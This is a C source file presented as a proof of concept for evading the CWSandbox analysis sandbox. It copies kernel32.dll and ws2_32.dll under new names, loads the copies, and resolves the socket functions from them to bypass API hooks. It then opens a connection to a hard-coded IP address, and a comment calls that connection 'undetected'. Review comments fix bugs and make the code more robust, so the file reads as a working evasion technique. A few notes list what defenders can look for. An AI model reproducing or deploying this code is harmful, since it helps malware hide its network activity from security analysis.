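#include "stdafx.h"
/* NOTE(review): the header names were lost from the original listing (six bare
 * "#include" tokens).  These are the headers the identifiers below require;
 * winsock2.h must come before windows.h. */
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <strsafe.h>
#include <tchar.h>
#include <string.h>

/*
 * Sandbox-evasion proof of concept (the original comment names CWSandbox).
 *
 * Rather than calling WSAStartup / WSASocketW / connect through the normally
 * loaded ws2_32.dll, whose exports a user-mode sandbox may have hooked, the
 * program copies kernel32.dll and ws2_32.dll out of the system directory
 * under a new name ("b0rked-<module>"), loads the private copies, takes
 * GetProcAddress from the copied kernel32 and resolves the socket functions
 * from the copied ws2_32, then makes an outbound TCP connection through them.
 *
 * Caveats visible in the code itself:
 *  - htons() and the first GetProcAddress() are still called through the
 *    program's normal import table, so ws2_32.dll and kernel32.dll remain
 *    statically imported; only the three socket calls go via the copies.
 *  - Defender indicators: files named b0rked-kernel32.dll / b0rked-ws2_32.dll
 *    created in the working directory, and a system DLL loaded from a
 *    non-system path.  The copies are not deleted on exit.
 */

typedef FARPROC (CALLBACK *GETPROC)(HMODULE, LPCSTR);
typedef SOCKET  (CALLBACK *WSASOCK)(int, int, int, DWORD, DWORD, DWORD);
typedef INT     (CALLBACK *WSACONN)(SOCKET, const struct sockaddr *, INT);
typedef INT     (CALLBACK *WSASTART)(WORD, LPWSADATA);
/* Added so teardown goes through the same private ws2_32 copy that created
 * the socket, rather than the normally imported one. */
typedef INT     (CALLBACK *WSACLOSE)(SOCKET);
typedef INT     (CALLBACK *WSACLEANUP)(void);

/*
 * Copy <system directory>\<module> into the current directory as
 * b0rked-<module> and load that copy.
 *
 * module: bare file name of a system DLL, e.g. _T("kernel32.dll").
 * Returns the module handle of the private copy, or NULL if any step fails
 * (GetLastError() describes the failing Win32 call).  The original checked
 * none of these calls and would hand a NULL handle on to GetProcAddress.
 */
HMODULE LoadDLL(LPCTSTR module)
{
    TCHAR sys[MAX_PATH], cwd[MAX_PATH], dll[MAX_PATH], src[MAX_PATH], dst[MAX_PATH];

    /* Both return 0 on failure, or the required size if the buffer is too small. */
    UINT  n_sys = GetSystemDirectory(sys, MAX_PATH);
    DWORD n_cwd = GetCurrentDirectory(MAX_PATH, cwd);
    if (n_sys == 0 || n_sys >= MAX_PATH || n_cwd == 0 || n_cwd >= MAX_PATH) {
        return NULL;
    }

    /* StringCchPrintf truncates on overflow and reports it via HRESULT;
     * a truncated path must not be copied or loaded. */
    if (FAILED(StringCchPrintf(dll, MAX_PATH, TEXT("b0rked-%s"), module)) ||
        FAILED(StringCchPrintf(src, MAX_PATH, TEXT("%s\\%s"), sys, module)) ||
        FAILED(StringCchPrintf(dst, MAX_PATH, TEXT("%s\\%s"), cwd, dll))) {
        return NULL;
    }

    /* bFailIfExists = FALSE: overwrite a stale b0rked-* copy. */
    if (!CopyFile(src, dst, FALSE)) {
        return NULL;
    }

    /* Load by full path.  The original passed the bare name "b0rked-<module>",
     * which goes through the normal DLL search order (the application
     * directory is searched before the current directory), so a planted file
     * of that name elsewhere on the search path would be loaded instead of
     * the copy just written. */
    return LoadLibrary(dst);
}

/*
 * Entry point: load private copies of kernel32/ws2_32, resolve the socket
 * functions from them and connect to the hard-coded address.
 *
 * Returns 0 if the connection was made, 1 if any step failed.  All handles
 * are released on every path; the original leaked the socket, the Winsock
 * session and both module handles, and returned 0 regardless of outcome.
 */
int main(void)
{
    WSADATA info;
    struct sockaddr_in sa;
    SOCKET s = INVALID_SOCKET;
    int rc = 1;
    HMODULE kernel32 = NULL;
    HMODULE ws2_32 = NULL;
    GETPROC    _GetProcAddress;
    WSASTART   _WSAStartup;
    WSASOCK    _WSASocketW;
    WSACONN    _connect;
    WSACLOSE   _closesocket;
    WSACLEANUP _WSACleanup;

    kernel32 = LoadDLL(_T("kernel32.dll"));
    if (kernel32 == NULL) {
        goto out;
    }
    /* Bootstrap GetProcAddress from the copied kernel32; every later lookup
     * goes through it rather than the normally imported kernel32. */
    _GetProcAddress = (GETPROC) GetProcAddress(kernel32, "GetProcAddress");
    if (_GetProcAddress == NULL) {
        goto out;
    }

    ws2_32 = LoadDLL(_T("ws2_32.dll"));
    if (ws2_32 == NULL) {
        goto out;
    }
    _WSAStartup  = (WSASTART)   _GetProcAddress(ws2_32, "WSAStartup");
    _WSASocketW  = (WSASOCK)    _GetProcAddress(ws2_32, "WSASocketW");
    _connect     = (WSACONN)    _GetProcAddress(ws2_32, "connect");
    _closesocket = (WSACLOSE)   _GetProcAddress(ws2_32, "closesocket");
    _WSACleanup  = (WSACLEANUP) _GetProcAddress(ws2_32, "WSACleanup");
    if (_WSAStartup == NULL || _WSASocketW == NULL || _connect == NULL ||
        _closesocket == NULL || _WSACleanup == NULL) {
        goto out;
    }

    /* Hard-coded target 72.14.207.99:80 — the four bytes are already in
     * network byte order, so they are copied straight into sin_addr. */
    memset(&sa, 0, sizeof(sa));
    memcpy(&sa.sin_addr, "\x48\x0e\xcf\x63", 4);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(80);

    /* evade CWSandbox and make undetected outgoing network connection */
    if (_WSAStartup(MAKEWORD(2, 0), &info) != 0) {
        goto out;
    }
    s = _WSASocketW(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
    if (s == INVALID_SOCKET) {
        goto out_wsa;
    }
    if (_connect(s, (struct sockaddr *)&sa, sizeof sa) == 0) {
        rc = 0;
    }

    _closesocket(s);
out_wsa:
    _WSACleanup();
out:
    if (ws2_32 != NULL) {
        FreeLibrary(ws2_32);
    }
    if (kernel32 != NULL) {
        FreeLibrary(kernel32);
    }
    return rc;
}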